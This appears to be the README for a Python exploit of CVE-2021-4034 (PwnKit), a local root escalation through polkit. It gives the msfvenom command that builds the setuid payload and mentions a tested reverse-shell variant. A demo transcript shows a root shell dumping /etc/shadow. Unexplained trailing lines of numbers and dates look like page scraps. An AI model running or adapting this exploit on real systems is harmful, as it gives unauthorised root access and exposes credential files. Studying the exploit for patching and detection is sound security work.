Python3 code to exploit CVE-2021-4034 (PWNKIT). This was an exercise in "can I make this work in Python?", and not meant as a robust exploit. It Works For Me, there are problaby bugs.
The default payload starts a shell as root, generated from msfvenom:
msfvenom -p linux/x64/exec -f elf-so PrependSetuid=true | base64
I've tested linux/x64/shell_reverse_tcp as well. Make sure you include the PrependSetuid=true argument to msfvenom, otherwise you'll just get a shell as the user and not root.
The code is cribbed from blasty, the orginal is available here
$ python CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# id
uid=0(root) gid=1000(jra) groups=1000(jra),4(adm),27(sudo),119(lpadmin),998(lxd)
# whoami
root
# head /etc/shadow
root:*:18709:0:99999:7:::
daemon:*:18709:0:99999:7:::
bin:*:18709:0:99999:7:::
sys:*:18709:0:99999:7:::
sync:*:18709:0:99999:7:::
games:*:18709:0:99999:7:::
man:*:18709:0:99999:7:::
lp:*:18709:0:99999:7:::
mail:*:18709:0:99999:7:::
news:*:18709:0:99999:7:::
#
500 Jan 6, 2023
20 Apr 7, 2022
228 Nov 25, 2022
210 Dec 31, 2022
105 Nov 22, 2022
168 Nov 9, 2022
23 Nov 9, 2022
130 Dec 15, 2022
3 Aug 13, 2022
3 Jun 22, 2022
80 Nov 28, 2022
16 Sep 6, 2022
2 Dec 30, 2021
140 Dec 27, 2022
112 Dec 1, 2022
867 Dec 22, 2022
2 Jun 23, 2022